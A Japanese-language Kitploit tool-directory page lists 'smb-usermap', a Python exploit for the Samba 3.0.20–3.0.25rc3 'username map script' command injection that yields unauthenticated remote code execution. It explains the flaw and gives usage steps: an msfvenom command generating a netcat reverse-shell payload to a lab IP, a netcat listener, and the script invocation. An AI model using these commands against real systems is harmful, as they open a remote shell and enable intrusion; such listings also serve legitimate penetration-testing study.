Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/h3x0v3rl0rd/smb-usermap
エクスプロイトペネトレーションテストリモートアクセスツール
GitHubh3x0v3rl0rd/smb-usermap

smb-usermap

Samba 3.0.20-3.0.25rc3 の 'username map script' コマンドインジェクションに対する Python エクスプロイトで、未認証のリモートコード実行とリバースシェルを提供します。

リポジトリを見る
4年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Samba "username map script" コマンド実行

このモジュールは、非デフォルトの "username map script" 設定オプションを使用している場合に、Samba バージョン 3.0.20 から 3.0.25rc3 におけるコマンド実行の脆弱性を悪用します。シェルのメタ文字を含むユーザー名を指定することで、攻撃者は任意のコマンドを実行できます。このオプションは認証前にユーザー名をマップするために使用されるため、この脆弱性を悪用するのに認証は必要ありません。

  1. シェルコードを作成
root@kitploit:~
msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.56 LPORT=5555 -f python
  1. Netcat リスナー
root@kitploit:~
nc -nlvp 5555
  1. スクリプトを実行
root@kitploit:~
python3 smbusermap.py <Target IP>

image

ツールをダウンロード